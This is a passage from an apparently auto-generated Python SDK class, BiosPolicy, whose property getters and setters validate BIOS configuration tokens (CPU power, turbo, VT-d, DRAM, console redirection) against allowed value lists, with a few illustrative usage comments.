allowed_values = ["platform-default", "auto", "disabled", "fast", "slow"]
if cke_low_policy not in allowed_values:
raise ValueError(
"Invalid value for `cke_low_policy` ({0}), must be one of {1}"
.format(cke_low_policy, allowed_values)
)
self._cke_low_policy = cke_low_policy
@property
def closed_loop_therm_throtl(self):
"""
Gets the closed_loop_therm_throtl of this BiosPolicy.
BIOS Token for setting Closed Loop Therm Throt configuration
:return: The closed_loop_therm_throtl of this BiosPolicy.
:rtype: str
"""
return self._closed_loop_therm_throtl
@closed_loop_therm_throtl.setter
def closed_loop_therm_throtl(self, closed_loop_therm_throtl):
"""
Sets the closed_loop_therm_throtl of this BiosPolicy.
BIOS Token for setting Closed Loop Therm Throt configuration
:param closed_loop_therm_throtl: The closed_loop_therm_throtl of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if closed_loop_therm_throtl not in allowed_values:
raise ValueError(
"Invalid value for `closed_loop_therm_throtl` ({0}), must be one of {1}"
.format(closed_loop_therm_throtl, allowed_values)
)
self._closed_loop_therm_throtl = closed_loop_therm_throtl
@property
def cmci_enable(self):
"""
Gets the cmci_enable of this BiosPolicy.
BIOS Token for setting Processor CMCI configuration
:return: The cmci_enable of this BiosPolicy.
:rtype: str
"""
return self._cmci_enable
@cmci_enable.setter
def cmci_enable(self, cmci_enable):
"""
Sets the cmci_enable of this BiosPolicy.
BIOS Token for setting Processor CMCI configuration
:param cmci_enable: The cmci_enable of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if cmci_enable not in allowed_values:
raise ValueError(
"Invalid value for `cmci_enable` ({0}), must be one of {1}"
.format(cmci_enable, allowed_values)
)
self._cmci_enable = cmci_enable
@property
def config_tdp(self):
"""
Gets the config_tdp of this BiosPolicy.
BIOS Token for setting Config TDP configuration
:return: The config_tdp of this BiosPolicy.
:rtype: str
"""
return self._config_tdp
@config_tdp.setter
def config_tdp(self, config_tdp):
"""
Sets the config_tdp of this BiosPolicy.
BIOS Token for setting Config TDP configuration
:param config_tdp: The config_tdp of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if config_tdp not in allowed_values:
raise ValueError(
"Invalid value for `config_tdp` ({0}), must be one of {1}"
.format(config_tdp, allowed_values)
)
self._config_tdp = config_tdp
@property
def console_redirection(self):
"""
Gets the console_redirection of this BiosPolicy.
BIOS Token for setting Console redirection configuration
:return: The console_redirection of this BiosPolicy.
:rtype: str
"""
return self._console_redirection
@console_redirection.setter
def console_redirection(self, console_redirection):
"""
Sets the console_redirection of this BiosPolicy.
BIOS Token for setting Console redirection configuration
:param console_redirection: The console_redirection of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "com-0", "com-1", "disabled", "enabled", "serial-port-a"]
if console_redirection not in allowed_values:
raise ValueError(
"Invalid value for `console_redirection` ({0}), must be one of {1}"
.format(console_redirection, allowed_values)
)
self._console_redirection = console_redirection
@property
def core_multi_processing(self):
"""
Gets the core_multi_processing of this BiosPolicy.
BIOS Token for setting Core MultiProcessing configuration
:return: The core_multi_processing of this BiosPolicy.
:rtype: str
"""
return self._core_multi_processing
@core_multi_processing.setter
def core_multi_processing(self, core_multi_processing):
"""
Sets the core_multi_processing of this BiosPolicy.
BIOS Token for setting Core MultiProcessing configuration
:param core_multi_processing: The core_multi_processing of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "1", "10", "11", "12", "13", "14", "15", "16", "17", "18", "19", "2", "20", "21", "22", "23", "24", "25", "26", "27", "28", "3", "4", "5", "6", "7", "8", "9", "all"]
if core_multi_processing not in allowed_values:
raise ValueError(
"Invalid value for `core_multi_processing` ({0}), must be one of {1}"
.format(core_multi_processing, allowed_values)
)
self._core_multi_processing = core_multi_processing
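    # Illustrative sketch: core_multi_processing takes the per-CPU enabled
    # core count as a string (or "all"). For example, to cap a server at
    # eight cores per socket:
    #
    #     policy.core_multi_processing = "8"   # note: the string "8"
    #     # Passing the integer 8 would raise ValueError, since the token is
    #     # string-typed and 8 is not in allowed_values.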
@property
def cpu_energy_performance(self):
"""
Gets the cpu_energy_performance of this BiosPolicy.
BIOS Token for setting Energy Performance configuration
:return: The cpu_energy_performance of this BiosPolicy.
:rtype: str
"""
return self._cpu_energy_performance
@cpu_energy_performance.setter
def cpu_energy_performance(self, cpu_energy_performance):
"""
Sets the cpu_energy_performance of this BiosPolicy.
BIOS Token for setting Energy Performance configuration
:param cpu_energy_performance: The cpu_energy_performance of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "balanced-energy", "balanced-performance", "balanced-power", "energy-efficient", "performance", "power"]
if cpu_energy_performance not in allowed_values:
raise ValueError(
"Invalid value for `cpu_energy_performance` ({0}), must be one of {1}"
.format(cpu_energy_performance, allowed_values)
)
self._cpu_energy_performance = cpu_energy_performance
@property
def cpu_frequency_floor(self):
"""
Gets the cpu_frequency_floor of this BiosPolicy.
BIOS Token for setting Frequency Floor Override configuration
:return: The cpu_frequency_floor of this BiosPolicy.
:rtype: str
"""
return self._cpu_frequency_floor
@cpu_frequency_floor.setter
def cpu_frequency_floor(self, cpu_frequency_floor):
"""
Sets the cpu_frequency_floor of this BiosPolicy.
BIOS Token for setting Frequency Floor Override configuration
:param cpu_frequency_floor: The cpu_frequency_floor of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if cpu_frequency_floor not in allowed_values:
raise ValueError(
"Invalid value for `cpu_frequency_floor` ({0}), must be one of {1}"
.format(cpu_frequency_floor, allowed_values)
)
self._cpu_frequency_floor = cpu_frequency_floor
@property
def cpu_performance(self):
"""
Gets the cpu_performance of this BiosPolicy.
BIOS Token for setting CPU Performance configuration
:return: The cpu_performance of this BiosPolicy.
:rtype: str
"""
return self._cpu_performance
@cpu_performance.setter
def cpu_performance(self, cpu_performance):
"""
Sets the cpu_performance of this BiosPolicy.
BIOS Token for setting CPU Performance configuration
:param cpu_performance: The cpu_performance of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "custom", "enterprise", "high-throughput", "hpc"]
if cpu_performance not in allowed_values:
raise ValueError(
"Invalid value for `cpu_performance` ({0}), must be one of {1}"
.format(cpu_performance, allowed_values)
)
self._cpu_performance = cpu_performance
@property
def cpu_power_management(self):
"""
Gets the cpu_power_management of this BiosPolicy.
BIOS Token for setting Power Technology configuration
:return: The cpu_power_management of this BiosPolicy.
:rtype: str
"""
return self._cpu_power_management
@cpu_power_management.setter
def cpu_power_management(self, cpu_power_management):
"""
Sets the cpu_power_management of this BiosPolicy.
BIOS Token for setting Power Technology configuration
:param cpu_power_management: The cpu_power_management of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "custom", "disabled", "energy-efficient", "performance"]
if cpu_power_management not in allowed_values:
raise ValueError(
"Invalid value for `cpu_power_management` ({0}), must be one of {1}"
.format(cpu_power_management, allowed_values)
)
self._cpu_power_management = cpu_power_management
@property
def demand_scrub(self):
"""
Gets the demand_scrub of this BiosPolicy.
BIOS Token for setting Demand Scrub configuration
:return: The demand_scrub of this BiosPolicy.
:rtype: str
"""
return self._demand_scrub
@demand_scrub.setter
def demand_scrub(self, demand_scrub):
"""
Sets the demand_scrub of this BiosPolicy.
BIOS Token for setting Demand Scrub configuration
:param demand_scrub: The demand_scrub of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if demand_scrub not in allowed_values:
raise ValueError(
"Invalid value for `demand_scrub` ({0}), must be one of {1}"
.format(demand_scrub, allowed_values)
)
self._demand_scrub = demand_scrub
@property
def direct_cache_access(self):
"""
Gets the direct_cache_access of this BiosPolicy.
BIOS Token for setting Direct Cache Access Support configuration
:return: The direct_cache_access of this BiosPolicy.
:rtype: str
"""
return self._direct_cache_access
@direct_cache_access.setter
def direct_cache_access(self, direct_cache_access):
"""
Sets the direct_cache_access of this BiosPolicy.
BIOS Token for setting Direct Cache Access Support configuration
:param direct_cache_access: The direct_cache_access of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "auto", "disabled", "enabled"]
if direct_cache_access not in allowed_values:
raise ValueError(
"Invalid value for `direct_cache_access` ({0}), must be one of {1}"
.format(direct_cache_access, allowed_values)
)
self._direct_cache_access = direct_cache_access
@property
def dram_clock_throttling(self):
"""
Gets the dram_clock_throttling of this BiosPolicy.
BIOS Token for setting DRAM Clock Throttling configuration
:return: The dram_clock_throttling of this BiosPolicy.
:rtype: str
"""
return self._dram_clock_throttling
@dram_clock_throttling.setter
def dram_clock_throttling(self, dram_clock_throttling):
"""
Sets the dram_clock_throttling of this BiosPolicy.
BIOS Token for setting DRAM Clock Throttling configuration
:param dram_clock_throttling: The dram_clock_throttling of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "Auto", "Balanced", "Energy Efficient", "Performance"]
if dram_clock_throttling not in allowed_values:
raise ValueError(
"Invalid value for `dram_clock_throttling` ({0}), must be one of {1}"
.format(dram_clock_throttling, allowed_values)
)
self._dram_clock_throttling = dram_clock_throttling
@property
def dram_refresh_rate(self):
"""
Gets the dram_refresh_rate of this BiosPolicy.
BIOS Token for setting DRAM Refresh Rate configuration
:return: The dram_refresh_rate of this BiosPolicy.
:rtype: str
"""
return self._dram_refresh_rate
@dram_refresh_rate.setter
def dram_refresh_rate(self, dram_refresh_rate):
"""
Sets the dram_refresh_rate of this BiosPolicy.
BIOS Token for setting DRAM Refresh Rate configuration
:param dram_refresh_rate: The dram_refresh_rate of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "1x", "2x", "3x", "4x", "Auto"]
if dram_refresh_rate not in allowed_values:
raise ValueError(
"Invalid value for `dram_refresh_rate` ({0}), must be one of {1}"
.format(dram_refresh_rate, allowed_values)
)
self._dram_refresh_rate = dram_refresh_rate
@property
def energy_efficient_turbo(self):
"""
Gets the energy_efficient_turbo of this BiosPolicy.
BIOS Token for setting Energy Efficient Turbo configuration
:return: The energy_efficient_turbo of this BiosPolicy.
:rtype: str
"""
return self._energy_efficient_turbo
@energy_efficient_turbo.setter
def energy_efficient_turbo(self, energy_efficient_turbo):
"""
Sets the energy_efficient_turbo of this BiosPolicy.
BIOS Token for setting Energy Efficient Turbo configuration
:param energy_efficient_turbo: The energy_efficient_turbo of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if energy_efficient_turbo not in allowed_values:
raise ValueError(
"Invalid value for `energy_efficient_turbo` ({0}), must be one of {1}"
.format(energy_efficient_turbo, allowed_values)
)
self._energy_efficient_turbo = energy_efficient_turbo
@property
def eng_perf_tuning(self):
"""
Gets the eng_perf_tuning of this BiosPolicy.
BIOS Token for setting Energy Performance Tuning configuration
:return: The eng_perf_tuning of this BiosPolicy.
:rtype: str
"""
return self._eng_perf_tuning
@eng_perf_tuning.setter
def eng_perf_tuning(self, eng_perf_tuning):
"""
Sets the eng_perf_tuning of this BiosPolicy.
BIOS Token for setting Energy Performance Tuning configuration
:param eng_perf_tuning: The eng_perf_tuning of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "BIOS", "OS"]
if eng_perf_tuning not in allowed_values:
raise ValueError(
"Invalid value for `eng_perf_tuning` ({0}), must be one of {1}"
.format(eng_perf_tuning, allowed_values)
)
self._eng_perf_tuning = eng_perf_tuning
@property
def enhanced_intel_speed_step_tech(self):
"""
Gets the enhanced_intel_speed_step_tech of this BiosPolicy.
BIOS Token for setting Enhanced Intel Speedstep(R) Technology configuration
:return: The enhanced_intel_speed_step_tech of this BiosPolicy.
:rtype: str
"""
return self._enhanced_intel_speed_step_tech
@enhanced_intel_speed_step_tech.setter
def enhanced_intel_speed_step_tech(self, enhanced_intel_speed_step_tech):
"""
Sets the enhanced_intel_speed_step_tech of this BiosPolicy.
BIOS Token for setting Enhanced Intel Speedstep(R) Technology configuration
:param enhanced_intel_speed_step_tech: The enhanced_intel_speed_step_tech of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if enhanced_intel_speed_step_tech not in allowed_values:
raise ValueError(
"Invalid value for `enhanced_intel_speed_step_tech` ({0}), must be one of {1}"
.format(enhanced_intel_speed_step_tech, allowed_values)
)
self._enhanced_intel_speed_step_tech = enhanced_intel_speed_step_tech
@property
def epp_profile(self):
"""
Gets the epp_profile of this BiosPolicy.
BIOS Token for setting EPP Profile configuration
:return: The epp_profile of this BiosPolicy.
:rtype: str
"""
return self._epp_profile
@epp_profile.setter
def epp_profile(self, epp_profile):
"""
Sets the epp_profile of this BiosPolicy.
BIOS Token for setting EPP Profile configuration
:param epp_profile: The epp_profile of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "Balanced Performance", "Balanced Power", "Performance", "Power"]
if epp_profile not in allowed_values:
raise ValueError(
"Invalid value for `epp_profile` ({0}), must be one of {1}"
.format(epp_profile, allowed_values)
)
self._epp_profile = epp_profile
@property
def execute_disable_bit(self):
"""
Gets the execute_disable_bit of this BiosPolicy.
BIOS Token for setting Execute Disable Bit configuration
:return: The execute_disable_bit of this BiosPolicy.
:rtype: str
"""
return self._execute_disable_bit
@execute_disable_bit.setter
def execute_disable_bit(self, execute_disable_bit):
"""
Sets the execute_disable_bit of this BiosPolicy.
BIOS Token for setting Execute Disable Bit configuration
:param execute_disable_bit: The execute_disable_bit of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if execute_disable_bit not in allowed_values:
raise ValueError(
"Invalid value for `execute_disable_bit` ({0}), must be one of {1}"
.format(execute_disable_bit, allowed_values)
)
self._execute_disable_bit = execute_disable_bit
@property
def extended_apic(self):
"""
Gets the extended_apic of this BiosPolicy.
BIOS Token for setting Local X2 Apic configuration
:return: The extended_apic of this BiosPolicy.
:rtype: str
"""
return self._extended_apic
@extended_apic.setter
def extended_apic(self, extended_apic):
"""
Sets the extended_apic of this BiosPolicy.
BIOS Token for setting Local X2 Apic configuration
:param extended_apic: The extended_apic of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "disabled", "enabled", "X2APIC", "XAPIC"]
if extended_apic not in allowed_values:
raise ValueError(
"Invalid value for `extended_apic` ({0}), must be one of {1}"
.format(extended_apic, allowed_values)
)
self._extended_apic = extended_apic
@property
def flow_control(self):
"""
Gets the flow_control of this BiosPolicy.
BIOS Token for setting Flow Control configuration
:return: The flow_control of this BiosPolicy.
:rtype: str
"""
return self._flow_control
@flow_control.setter
def flow_control(self, flow_control):
"""
Sets the flow_control of this BiosPolicy.
BIOS Token for setting Flow Control configuration
:param flow_control: The flow_control of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "none", "rts-cts"]
if flow_control not in allowed_values:
raise ValueError(
"Invalid value for `flow_control` ({0}), must be one of {1}"
.format(flow_control, allowed_values)
)
self._flow_control = flow_control
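    # Illustrative sketch: a serial-over-LAN console typically touches the
    # redirection, baud-rate and flow-control tokens together. "com-0" and
    # "115200" come from the setters' allowed_values; combining them is an
    # assumed common configuration, not a mandated one.
    #
    #     policy.console_redirection = "com-0"
    #     policy.baud_rate = "115200"
    #     policy.flow_control = "none"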
@property
def frb2enable(self):
"""
Gets the frb2enable of this BiosPolicy.
BIOS Token for setting FRB-2 Timer configuration
:return: The frb2enable of this BiosPolicy.
:rtype: str
"""
return self._frb2enable
@frb2enable.setter
def frb2enable(self, frb2enable):
"""
Sets the frb2enable of this BiosPolicy.
BIOS Token for setting FRB-2 Timer configuration
:param frb2enable: The frb2enable of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if frb2enable not in allowed_values:
raise ValueError(
"Invalid value for `frb2enable` ({0}), must be one of {1}"
.format(frb2enable, allowed_values)
)
self._frb2enable = frb2enable
@property
def hardware_prefetch(self):
"""
Gets the hardware_prefetch of this BiosPolicy.
BIOS Token for setting Hardware Prefetcher configuration
:return: The hardware_prefetch of this BiosPolicy.
:rtype: str
"""
return self._hardware_prefetch
@hardware_prefetch.setter
def hardware_prefetch(self, hardware_prefetch):
"""
Sets the hardware_prefetch of this BiosPolicy.
BIOS Token for setting Hardware Prefetcher configuration
:param hardware_prefetch: The hardware_prefetch of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if hardware_prefetch not in allowed_values:
raise ValueError(
"Invalid value for `hardware_prefetch` ({0}), must be one of {1}"
.format(hardware_prefetch, allowed_values)
)
self._hardware_prefetch = hardware_prefetch
@property
def hwpm_enable(self):
"""
Gets the hwpm_enable of this BiosPolicy.
BIOS Token for setting CPU Hardware Power Management configuration
:return: The hwpm_enable of this BiosPolicy.
:rtype: str
"""
return self._hwpm_enable
@hwpm_enable.setter
def hwpm_enable(self, hwpm_enable):
"""
Sets the hwpm_enable of this BiosPolicy.
BIOS Token for setting CPU Hardware Power Management configuration
:param hwpm_enable: The hwpm_enable of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "Disabled", "HWPM Native Mode", "HWPM OOB Mode", "NATIVE MODE", "Native Mode with no Legacy", "OOB MODE"]
if hwpm_enable not in allowed_values:
raise ValueError(
"Invalid value for `hwpm_enable` ({0}), must be one of {1}"
.format(hwpm_enable, allowed_values)
)
self._hwpm_enable = hwpm_enable
@property
def imc_interleave(self):
"""
Gets the imc_interleave of this BiosPolicy.
BIOS Token for setting IMC Interleaving configuration
:return: The imc_interleave of this BiosPolicy.
:rtype: str
"""
return self._imc_interleave
@imc_interleave.setter
def imc_interleave(self, imc_interleave):
"""
Sets the imc_interleave of this BiosPolicy.
BIOS Token for setting IMC Interleaving configuration
:param imc_interleave: The imc_interleave of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "1-way Interleave", "2-way Interleave", "Auto"]
if imc_interleave not in allowed_values:
raise ValueError(
"Invalid value for `imc_interleave` ({0}), must be one of {1}"
.format(imc_interleave, allowed_values)
)
self._imc_interleave = imc_interleave
@property
def intel_hyper_threading_tech(self):
"""
Gets the intel_hyper_threading_tech of this BiosPolicy.
BIOS Token for setting Intel HyperThreading Tech configuration
:return: The intel_hyper_threading_tech of this BiosPolicy.
:rtype: str
"""
return self._intel_hyper_threading_tech
@intel_hyper_threading_tech.setter
def intel_hyper_threading_tech(self, intel_hyper_threading_tech):
"""
Sets the intel_hyper_threading_tech of this BiosPolicy.
BIOS Token for setting Intel HyperThreading Tech configuration
:param intel_hyper_threading_tech: The intel_hyper_threading_tech of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if intel_hyper_threading_tech not in allowed_values:
raise ValueError(
"Invalid value for `intel_hyper_threading_tech` ({0}), must be one of {1}"
.format(intel_hyper_threading_tech, allowed_values)
)
self._intel_hyper_threading_tech = intel_hyper_threading_tech
@property
def intel_turbo_boost_tech(self):
"""
Gets the intel_turbo_boost_tech of this BiosPolicy.
BIOS Token for setting Intel Turbo Boost Tech configuration
:return: The intel_turbo_boost_tech of this BiosPolicy.
:rtype: str
"""
return self._intel_turbo_boost_tech
@intel_turbo_boost_tech.setter
def intel_turbo_boost_tech(self, intel_turbo_boost_tech):
"""
Sets the intel_turbo_boost_tech of this BiosPolicy.
BIOS Token for setting Intel Turbo Boost Tech configuration
:param intel_turbo_boost_tech: The intel_turbo_boost_tech of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if intel_turbo_boost_tech not in allowed_values:
raise ValueError(
"Invalid value for `intel_turbo_boost_tech` ({0}), must be one of {1}"
.format(intel_turbo_boost_tech, allowed_values)
)
self._intel_turbo_boost_tech = intel_turbo_boost_tech
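    # Illustrative sketch: a performance-oriented tuning of the power tokens
    # defined above. Turbo Boost generally requires SpeedStep to be enabled on
    # Intel platforms; the exact interaction is the platform firmware's
    # concern, not this model's.
    #
    #     policy.intel_turbo_boost_tech = "enabled"
    #     policy.enhanced_intel_speed_step_tech = "enabled"
    #     policy.cpu_power_management = "performance"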
@property
def intel_virtualization_technology(self):
"""
Gets the intel_virtualization_technology of this BiosPolicy.
BIOS Token for setting Intel(R) VT configuration
:return: The intel_virtualization_technology of this BiosPolicy.
:rtype: str
"""
return self._intel_virtualization_technology
@intel_virtualization_technology.setter
def intel_virtualization_technology(self, intel_virtualization_technology):
"""
Sets the intel_virtualization_technology of this BiosPolicy.
BIOS Token for setting Intel(R) VT configuration
:param intel_virtualization_technology: The intel_virtualization_technology of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if intel_virtualization_technology not in allowed_values:
raise ValueError(
"Invalid value for `intel_virtualization_technology` ({0}), must be one of {1}"
.format(intel_virtualization_technology, allowed_values)
)
self._intel_virtualization_technology = intel_virtualization_technology
@property
def intel_vt_for_directed_io(self):
"""
Gets the intel_vt_for_directed_io of this BiosPolicy.
BIOS Token for setting Intel VT for directed IO configuration
:return: The intel_vt_for_directed_io of this BiosPolicy.
:rtype: str
"""
return self._intel_vt_for_directed_io
@intel_vt_for_directed_io.setter
def intel_vt_for_directed_io(self, intel_vt_for_directed_io):
"""
Sets the intel_vt_for_directed_io of this BiosPolicy.
BIOS Token for setting Intel VT for directed IO configuration
:param intel_vt_for_directed_io: The intel_vt_for_directed_io of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if intel_vt_for_directed_io not in allowed_values:
raise ValueError(
"Invalid value for `intel_vt_for_directed_io` ({0}), must be one of {1}"
.format(intel_vt_for_directed_io, allowed_values)
)
self._intel_vt_for_directed_io = intel_vt_for_directed_io
@property
def intel_vtd_coherency_support(self):
"""
Gets the intel_vtd_coherency_support of this BiosPolicy.
BIOS Token for setting Intel(R) VT-d Coherency Support configuration
:return: The intel_vtd_coherency_support of this BiosPolicy.
:rtype: str
"""
return self._intel_vtd_coherency_support
@intel_vtd_coherency_support.setter
def intel_vtd_coherency_support(self, intel_vtd_coherency_support):
"""
Sets the intel_vtd_coherency_support of this BiosPolicy.
BIOS Token for setting Intel(R) VT-d Coherency Support configuration
:param intel_vtd_coherency_support: The intel_vtd_coherency_support of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if intel_vtd_coherency_support not in allowed_values:
raise ValueError(
"Invalid value for `intel_vtd_coherency_support` ({0}), must be one of {1}"
.format(intel_vtd_coherency_support, allowed_values)
)
self._intel_vtd_coherency_support = intel_vtd_coherency_support
@property
def intel_vtd_interrupt_remapping(self):
"""
Gets the intel_vtd_interrupt_remapping of this BiosPolicy.
BIOS Token for setting Intel(R) VT-d Interrupt Remapping configuration
:return: The intel_vtd_interrupt_remapping of this BiosPolicy.
:rtype: str
"""
return self._intel_vtd_interrupt_remapping
@intel_vtd_interrupt_remapping.setter
def intel_vtd_interrupt_remapping(self, intel_vtd_interrupt_remapping):
"""
Sets the intel_vtd_interrupt_remapping of this BiosPolicy.
BIOS Token for setting Intel(R) VT-d Interrupt Remapping configuration
:param intel_vtd_interrupt_remapping: The intel_vtd_interrupt_remapping of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if intel_vtd_interrupt_remapping not in allowed_values:
raise ValueError(
"Invalid value for `intel_vtd_interrupt_remapping` ({0}), must be one of {1}"
.format(intel_vtd_interrupt_remapping, allowed_values)
)
self._intel_vtd_interrupt_remapping = intel_vtd_interrupt_remapping
@property
def intel_vtd_pass_through_dma_support(self):
"""
Gets the intel_vtd_pass_through_dma_support of this BiosPolicy.
BIOS Token for setting Intel(R) VT-d PassThrough DMA support configuration
:return: The intel_vtd_pass_through_dma_support of this BiosPolicy.
:rtype: str
"""
return self._intel_vtd_pass_through_dma_support
@intel_vtd_pass_through_dma_support.setter
def intel_vtd_pass_through_dma_support(self, intel_vtd_pass_through_dma_support):
"""
Sets the intel_vtd_pass_through_dma_support of this BiosPolicy.
BIOS Token for setting Intel(R) VT-d PassThrough DMA support configuration
:param intel_vtd_pass_through_dma_support: The intel_vtd_pass_through_dma_support of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if intel_vtd_pass_through_dma_support not in allowed_values:
raise ValueError(
"Invalid value for `intel_vtd_pass_through_dma_support` ({0}), must be one of {1}"
.format(intel_vtd_pass_through_dma_support, allowed_values)
)
self._intel_vtd_pass_through_dma_support = intel_vtd_pass_through_dma_support
@property
def intel_vtdats_support(self):
"""
Gets the intel_vtdats_support of this BiosPolicy.
BIOS Token for setting Intel VTD ATS support configuration
:return: The intel_vtdats_support of this BiosPolicy.
:rtype: str
"""
return self._intel_vtdats_support
@intel_vtdats_support.setter
def intel_vtdats_support(self, intel_vtdats_support):
"""
Sets the intel_vtdats_support of this BiosPolicy.
BIOS Token for setting Intel VTD ATS support configuration
:param intel_vtdats_support: The intel_vtdats_support of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if intel_vtdats_support not in allowed_values:
raise ValueError(
"Invalid value for `intel_vtdats_support` ({0}), must be one of {1}"
.format(intel_vtdats_support, allowed_values)
)
self._intel_vtdats_support = intel_vtdats_support
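    # Illustrative sketch: enabling PCIe device passthrough usually means
    # turning on VT plus the VT-d tokens above. Which optional VT-d features
    # (ATS, coherency, interrupt remapping) a hypervisor actually needs
    # varies; enabling all of them is shown only as an example. setattr()
    # still routes through each property setter, so validation applies.
    #
    #     for token in ("intel_virtualization_technology",
    #                   "intel_vt_for_directed_io",
    #                   "intel_vtd_interrupt_remapping",
    #                   "intel_vtdats_support"):
    #         setattr(policy, token, "enabled")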
@property
def ioh_error_enable(self):
"""
Gets the ioh_error_enable of this BiosPolicy.
BIOS Token for setting IIO Error Enable configuration
:return: The ioh_error_enable of this BiosPolicy.
:rtype: str
"""
return self._ioh_error_enable
@ioh_error_enable.setter
def ioh_error_enable(self, ioh_error_enable):
"""
Sets the ioh_error_enable of this BiosPolicy.
BIOS Token for setting IIO Error Enable configuration
:param ioh_error_enable: The ioh_error_enable of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "No", "Yes"]
if ioh_error_enable not in allowed_values:
raise ValueError(
"Invalid value for `ioh_error_enable` ({0}), must be one of {1}"
.format(ioh_error_enable, allowed_values)
)
self._ioh_error_enable = ioh_error_enable
@property
def ioh_resource(self):
"""
Gets the ioh_resource of this BiosPolicy.
BIOS Token for setting IOH Resource Allocation configuration
:return: The ioh_resource of this BiosPolicy.
:rtype: str
"""
return self._ioh_resource
@ioh_resource.setter
def ioh_resource(self, ioh_resource):
"""
Sets the ioh_resource of this BiosPolicy.
BIOS Token for setting IOH Resource Allocation configuration
:param ioh_resource: The ioh_resource of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "IOH0 24k IOH1 40k", "IOH0 32k IOH1 32k", "IOH0 40k IOH1 24k", "IOH0 48k IOH1 16k", "IOH0 56k IOH1 8k"]
if ioh_resource not in allowed_values:
raise ValueError(
"Invalid value for `ioh_resource` ({0}), must be one of {1}"
.format(ioh_resource, allowed_values)
)
self._ioh_resource = ioh_resource
@property
def ip_prefetch(self):
"""
Gets the ip_prefetch of this BiosPolicy.
BIOS Token for setting DCU IP Prefetcher configuration
:return: The ip_prefetch of this BiosPolicy.
:rtype: str
"""
return self._ip_prefetch
@ip_prefetch.setter
def ip_prefetch(self, ip_prefetch):
"""
Sets the ip_prefetch of this BiosPolicy.
BIOS Token for setting DCU IP Prefetcher configuration
:param ip_prefetch: The ip_prefetch of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if ip_prefetch not in allowed_values:
raise ValueError(
"Invalid value for `ip_prefetch` ({0}), must be one of {1}"
.format(ip_prefetch, allowed_values)
)
self._ip_prefetch = ip_prefetch
@property
def ipv6pxe(self):
"""
Gets the ipv6pxe of this BiosPolicy.
BIOS Token for setting IPV6 PXE Support configuration
:return: The ipv6pxe of this BiosPolicy.
:rtype: str
"""
return self._ipv6pxe
@ipv6pxe.setter
def ipv6pxe(self, ipv6pxe):
"""
Sets the ipv6pxe of this BiosPolicy.
BIOS Token for setting IPV6 PXE Support configuration
:param ipv6pxe: The ipv6pxe of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if ipv6pxe not in allowed_values:
raise ValueError(
"Invalid value for `ipv6pxe` ({0}), must be one of {1}"
.format(ipv6pxe, allowed_values)
)
self._ipv6pxe = ipv6pxe
@property
def kti_prefetch(self):
"""
Gets the kti_prefetch of this BiosPolicy.
BIOS Token for setting KTI Prefetch configuration
:return: The kti_prefetch of this BiosPolicy.
:rtype: str
"""
return self._kti_prefetch
@kti_prefetch.setter
def kti_prefetch(self, kti_prefetch):
"""
Sets the kti_prefetch of this BiosPolicy.
BIOS Token for setting KTI Prefetch configuration
:param kti_prefetch: The kti_prefetch of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if kti_prefetch not in allowed_values:
raise ValueError(
"Invalid value for `kti_prefetch` ({0}), must be one of {1}"
.format(kti_prefetch, allowed_values)
)
self._kti_prefetch = kti_prefetch
@property
def legacy_os_redirection(self):
"""
Gets the legacy_os_redirection of this BiosPolicy.
BIOS Token for setting Legacy OS redirection configuration
:return: The legacy_os_redirection of this BiosPolicy.
:rtype: str
"""
return self._legacy_os_redirection
@legacy_os_redirection.setter
def legacy_os_redirection(self, legacy_os_redirection):
"""
Sets the legacy_os_redirection of this BiosPolicy.
BIOS Token for setting Legacy OS redirection configuration
:param legacy_os_redirection: The legacy_os_redirection of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if legacy_os_redirection not in allowed_values:
raise ValueError(
"Invalid value for `legacy_os_redirection` ({0}), must be one of {1}"
.format(legacy_os_redirection, allowed_values)
)
self._legacy_os_redirection = legacy_os_redirection
@property
def legacy_usb_support(self):
"""
Gets the legacy_usb_support of this BiosPolicy.
BIOS Token for setting Legacy USB Support configuration
